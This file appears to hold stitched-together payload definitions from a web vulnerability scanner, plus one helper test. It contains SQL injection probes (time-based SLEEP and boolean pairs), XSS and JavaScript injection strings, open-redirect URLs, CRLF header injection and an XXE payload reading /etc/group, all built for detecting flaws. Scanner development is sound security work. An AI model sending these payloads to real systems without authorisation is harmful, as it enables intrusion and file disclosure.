def __init__(self): """Define static payloads""" self._payloads = [ "'", '"', '(', ')', "NULL", utility.generate_random(string.ascii_lowercase, size=5), utility.generate_random(string.digits, size=4), "--" ]
def __init__(self): """Define static payloads""" payloads = [ # single quotes ("' UNION SELECT SLEEP(9) -- ", 9.00), ("' UNION SELECT null,SLEEP(9) -- ", 9.00), ("' UNION SELECT null,null,SLEEP(9) -- ", 9.00), ("' UNION SELECT null,null,null,SLEEP(9) -- ", 9.00), ("' UNION SELECT null,null,null,null,SLEEP(9) -- ", 9.00), # double quotes ('" UNION SELECT SLEEP(9) -- ', 9.00), ('" UNION SELECT null,SLEEP(9) -- ', 9.00), ('" UNION SELECT null,null,SLEEP(9) -- ', 9.00), ('" UNION SELECT null,null,null,SLEEP(9) -- ', 9.00), ('" UNION SELECT null,null,null,null,SLEEP(9) -- ', 9.00), # integer ("1 UNION SELECT SLEEP(9) -- ", 9.00), ("1 UNION SELECT null,SLEEP(9) -- ", 9.00), ("1 UNION SELECT null,null,SLEEP(9) -- ", 9.00), ("1 UNION SELECT null,null,null,SLEEP(9) -- ", 9.00), ("1 UNION SELECT null,null,null,null,SLEEP(9) -- ", 9.00), # operator ("' AND SLEEP(9) AND '{}'='{}", 9.00), ("' OR SLEEP(9) AND '{}'='{}", 9.00), ("') AND SLEEP(9) AND ('{}'='{}", 9.00), ("') OR SLEEP(9) AND ('{}'='{}", 9.00) ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase, size=4) self._payloads = [(payload.format(self._random, self._random), delay) for payload, delay in payloads]
def __init__(self): """Define static payloads""" payloads = [ # AND ("' AND '{}'='{}", "' AND '{}'='!{}"), ("' AND '{}'='{}' -- ", "' AND '{}'='!{}' -- "), ("' AND '{}'='{}' #", "' AND '{}'='!{}' #"), # OR ("' OR '{}'='{}", "' AND '{}'='!{}"), ("' OR '{}'='{}' -- ", "' AND '{}'='!{}' -- "), ("' OR '{}'='{}' #", "' AND '{}'='!{}' #"), # like ("%' AND '%'='", "%' AND '%'='!"), ("%' OR '%'='", "%' AND '%'='!"), # double quotes ('" OR "{}"="{}', '" AND "{}"="!{}'), ('" OR "{}"="{}" -- ', '" AND "{}"="!{}" -- '), ('" OR "{}"="{}" #', '" AND "{}"="!{}" #'), # integer ("1 OR 1221=1221", "1 AND 1221=2112"), # parentheses ("') AND ('{}'='{}", "') AND ('{}'='!{}"), ("') OR ('{}'='{}", "') AND ('{}'='!{}") ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase, size=4) self._payloads = [(true.format(self._random, self._random), false.format(self._random, self._random)) for true, false in payloads]
def __init__(self): """Define static payload""" payloads = ["javascript:{}()"] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase, size=4) self._payloads = [payload.format(self._random) for payload in payloads]
def __init__(self): """Define static payloads""" payloads = [ # two tags '<{}></{}>', '"><{}></{}><"', "'><{}></{}><'", ' ><{}></{}>< ', # one tag '<{} event=()>', '"><{} event=()><"', "'><{} event=()><'", ' ><{} event=()>< ', # script tags '</script><{}></{}><script>', '</script><{} event=()><script>', # special characters '\\"><{}></{}><\\"', '\\"><{} event=()><\\"' ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase) self._payloads = [ payload.format(self._random, self._random) for payload in payloads ]
def __init__(self): """Define static payloads""" payloads = [ 'http://www.{}.com', 'https://www.{}.com', '//www.{}.com', '/\t/www.{}.com', '/\\www.{}.com', 'https:www.{}.com' ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase) self._payloads = [payload.format(self._random) for payload in payloads]
def test_generate_random(): # ascii letters test = utility.generate_random(string.ascii_letters) assert test.isalpha() assert len(test) == 7 # digits test = utility.generate_random(string.digits) assert test.isdigit() assert len(test) == 7 # custom size test = utility.generate_random(string.ascii_letters, size=20) assert test.isalpha() assert len(test) == 20 # empty test = utility.generate_random('') assert test == ''
def __init__(self): """Define static payloads""" payloads = [ '\r\nSet-Cookie: {}={}', '\nSet-Cookie: {}={}', '\rSet-Cookie: {}={}', 'čĊSet-Cookie: {}={}' ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase) self._payloads = [ payload.format(self._random, self._random) for payload in payloads ]
def __init__(self): """Define static payloads""" payloads = [ '<?xml version="1.0"?><!DOCTYPE {} [<!ENTITY {} SYSTEM "file:///etc/group">]><{}>&{};</{}>' ] # generate random self._random = utility.generate_random(string.ascii_lowercase, size=4) # add to payloads root, entity = (self._random[::-1], self._random) self._payloads = [payload.format(root, entity, root, entity, root) for payload in payloads]
def __init__(self): """Define static payload""" payloads = [ # within src attribute '//www.{}.com/{}.js', '\\www.{}.com\\{}.js', # add src attribute '" src=//www.{}.com/{}.js><"', '" src=\\www.{}.com\\{}.js><"', "' src=//www.{}.com/{}.js><'", "' src=\\www.{}.com\\{}.js><'", " src=//www.{}.com/{}.js>< ", " src=\\www.{}.com\\{}.js>< " ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase) self._payloads = [payload.format(self._random, self._random[0]) for payload in payloads]
def __init__(self): """Define static payloads""" payloads = [ # single quotes "'+{}()+'", "';{}();//'", # double quotes '"+{}()+"', '";{}();//"', # no quotes '{}()', # no parentheses "'+{}``+'", '"+{}``+"', "';{}``;//'", '";{}``;//"' ] # generate random and add to payloads self._random = utility.generate_random(string.ascii_lowercase, size=5) self._payloads = [payload.format(self._random, self._random) for payload in payloads]